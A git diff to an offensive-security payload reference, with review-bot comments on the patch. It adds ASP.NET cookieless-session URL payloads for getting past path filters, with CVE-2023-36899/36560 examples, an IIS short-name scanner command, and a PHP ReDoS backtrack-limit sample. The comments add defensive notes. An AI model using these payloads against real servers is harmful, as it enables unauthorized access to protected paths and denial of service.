diff --git a/Directory Traversal/README.md b/Directory Traversal/README.md index fc622d1..50c531e 100644 --- a/Directory Traversal/README.md +++ b/Directory Traversal/README.md @@ -14,6 +14,7 @@ * [UNC Bypass](#unc-bypass) * [NGINX/ALB Bypass](#nginxalb-bypass) * [ASPNET Cookieless Bypass](#aspnet-cookieless-bypass) + * [IIS Short Name](#iis-short-name) * [Path Traversal](#path-traversal) * [Interesting Linux files](#interesting-linux-files) * [Interesting Windows files](#interesting-windows-files) 
@@ -104,18 +105,55 @@ To bypass this behaviour just add forward slashes in front of the url: ```http://nginx-server////////../../``` -### ASPNET Cookieless Bypass +### ASP NET Cookieless Bypass When cookieless session state is enabled. Instead of relying on a cookie to identify the session, ASP.NET modifies the URL by embedding the Session ID directly into it. For example, a typical URL might be transformed from: `http://example.com/page.aspx` to something like: `http://example.com/(S(lit3py55t21z5v55vlm25s55))/page.aspx`. The value within `(S(...))` is the Session ID. + +| .NET Version | URI | +| -------------- | -------------------------- | +| V1.0, V1.1 | /(XXXXXXXX)/ | +| V2.0+ | /(S(XXXXXXXX))/ | +| V2.0+ | /(A(XXXXXXXX)F(YYYYYYYY))/ | +| V2.0+ | ... | + + We can use this behavior to bypass filtered URLs. -```powershell -/admin/(S(X))/main.aspx -/admin/Foobar/(S(X))/../(S(X))/main.aspx -/(S(X))/admin/(S(X))/main.aspx +* If your application is in the main folder + ```ps1 + /(S(X))/ + /(Y(Z))/ + /(G(AAA-BBB)D(CCC=DDD)E(0-1))/ + /(S(X))/admin/(S(X))/main.aspx + /(S(x))/b/(S(x))in/Navigator.dll + ``` + +* If your application is in a subfolder + ```ps1 + /MyApp/(S(X))/ + /admin/(S(X))/main.aspx + /admin/Foobar/(S(X))/../(S(X))/main.aspx + ``` + + +| CVE | Payload | +| -------------- | ---------------------------------------------- | +| CVE-2023-36899 | /WebForm/(S(X))/prot/(S(X))ected/target1.aspx | +| - | /WebForm/(S(X))/b/(S(X))in/target2.aspx | +| CVE-2023-36560 | /WebForm/pro/(S(X))tected/target1.aspx/(S(X))/ | +| - | /WebForm/b/(S(X))in/target2.aspx/(S(X))/ | + + +### IIS Short Name + +* [irsdl/IIS-ShortName-Scanner](https://github.com/irsdl/IIS-ShortName-Scanner) + +```ps1 +java -jar ./iis_shortname_scanner.jar 20 8 'https://X.X.X.X/bin::$INDEX_ALLOCATION/' +java -jar ./iis_shortname_scanner.jar 20 8 'https://X.X.X.X/MyApp/bin::$INDEX_ALLOCATION/' ``` 
@@ -235,4 +273,5 @@ The following log files are controllable and can be included with an evil payloa * [NGINX may be protecting your applications from traversal attacks without you even knowing](https://medium.com/appsflyer/nginx-may-be-protecting-your-applications-from-traversal-attacks-without-you-even-knowing-b08f882fd43d?source=friends_link&sk=e9ddbadd61576f941be97e111e953381) * [Directory traversal - Portswigger](https://portswigger.net/web-security/file-path-traversal) * [Cookieless ASPNET - Soroush Dalili](https://twitter.com/irsdl/status/1640390106312835072) -* [EP 057 | Proc filesystem tricks & locatedb abuse with @_remsio_ & @_bluesheet - TheLaluka - 30 nov. 2023](https://youtu.be/YlZGJ28By8U) \ No newline at end of file +* [EP 057 | Proc filesystem tricks & locatedb abuse with @_remsio_ & @_bluesheet - TheLaluka - 30 nov. 2023](https://youtu.be/YlZGJ28By8U) +* [Understand How the ASP.NET Cookieless Feature Works - Microsoft Documentation - 06/24/2011](https://learn.microsoft.com/en-us/previous-versions/dotnet/articles/aa479315(v=msdn.10)) \ No newline at end of file diff --git a/Regular Expression/README.md b/Regular Expression/README.md index 3a29a8a..b54d973 100644 --- a/Regular Expression/README.md +++ b/Regular Expression/README.md 
@@ -30,7 +30,36 @@ Evil Regex contains: These regular expressions can be exploited with `aaaaaaaaaaaaaaaaaaaaaaaa!` +### Backtrack Limit + +Backtracking in regular expressions occurs when the regex engine tries to match a pattern and encounters a mismatch. The engine then backtracks to the previous matching position and tries an alternative path to find a match. This process can be repeated many times, especially with complex patterns and large input strings. + +PHP PCRE configuration options + +| Name | Default | Note | +|----------------------|---------|---------| +| pcre.backtrack_limit | 1000000 | 100000 for `PHP < 5.3.7`| +| pcre.recursion_limit | 100000 | / | +| pcre.jit | 1  | / | + + +Sometimes it is possible to force the regex to exceed more than 100 000 recursions which will cause a ReDOS and make `preg_match` returning false: + +```php +$pattern = '/(a+)+$/'; +$subject = str_repeat('a', 1000) . 'b'; + +if (preg_match($pattern, $subject)) { + echo "Match found"; +} else { + echo "No match"; +} +``` + + ## References * [Regular expression Denial of Service - ReDoS - OWASP - Adar Weidman](https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS) -* [OWASP Validation Regex Repository - OWASP](https://wiki.owasp.org/index.php/OWASP_Validation_Regex_Repository) \ No newline at end of file +* [OWASP Validation Regex Repository - OWASP](https://wiki.owasp.org/index.php/OWASP_Validation_Regex_Repository) +* [PHP Manual > Function Reference > Text Processing > PCRE > Installing/Configuring > Runtime Configuration](https://www.php.net/manual/en/pcre.configuration.php#ini.pcre.recursion-limit) +* [Intigriti Challenge 1223 - HACKBOOK OF A HACKER](https://simones-organization-4.gitbook.io/hackbook-of-a-hacker/ctf-writeups/intigriti-challenges/1223) \ No newline at end of file
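Review bot: In the first hunk of `Directory Traversal/README.md` (the table of contents), the unchanged entry `* [ASPNET Cookieless Bypass](#aspnet-cookieless-bypass)` stops resolving once the heading is renamed to `### ASP NET Cookieless Bypass` in the next hunk, because GitHub derives the anchor from the heading text and would generate `#asp-net-cookieless-bypass`. Either keep the original heading (the reference list in this same patch still calls it "Cookieless ASPNET") or update the TOC link to match. The new `* [IIS Short Name](#iis-short-name)` entry is consistent with its heading.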
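Review bot: In the second hunk of `Directory Traversal/README.md`, the new `### IIS Short Name` section ships two `java -jar ./iis_shortname_scanner.jar 20 8 ...` invocations with no explanation of what is being enumerated, what the positional arguments `20` and `8` control, or why `::$INDEX_ALLOCATION` is appended to the path; a sentence or two (or a pointer to the linked tool's README) is needed before this is usable, and a line on the defensive side (this disclosure goes away when 8.3 short-name generation is disabled on the volume and existing short names are removed) would fit the rest of the page. In the ASP.NET part of the same hunk, the `.NET Version` table ends with a placeholder row `| V2.0+ | ... |` that carries no information and should be completed or dropped; the rows marked `-` in the `CVE | Payload` table cannot be told apart from variants of the CVE listed above them and want a source or a short label; and the `ps1` fence tag on lists of URL paths is misleading (a plain or `text` fence would be clearer).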
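Review bot: In the third hunk (references of `Directory Traversal/README.md`), the added Microsoft Docs entry is itself followed by `\ No newline at end of file`, so the patch swaps one last line without a trailing newline for another; add the newline so the next append does not produce a spurious `-`/`+` pair on the final line. Minor: the date format `06/24/2011` does not match the `30 nov. 2023` style of the neighbouring entry.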
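Review bot: In the `Regular Expression/README.md` hunk, the sample code does not demonstrate the claim made just above it ("make `preg_match` returning false", which should read "return false"): `preg_match` returns `false` on error and `0` on a clean non-match, and the `if/else` collapses both into "No match", so the reader never sees the limit being hit. Compare the result with `=== 1` and inspect `preg_last_error()` (e.g. `PREG_BACKTRACK_LIMIT_ERROR`) in the sample; that is also the defensive point worth stating, since a deny-pattern check written as `if (!preg_match(...))` treats a limit error exactly like a non-match and lets the input through. The prose also says "exceed more than 100 000 recursions" while the table lists `pcre.backtrack_limit` at 1000000 and `pcre.recursion_limit` at 100000; say which limit the `(a+)+$` sample actually trips, and note that the table's own `pcre.jit` default of `1` changes which error is reported (the JIT path has its own limit, `PREG_JIT_STACKLIMIT_ERROR`). Spelling: `ReDOS` here versus `ReDoS` in the references.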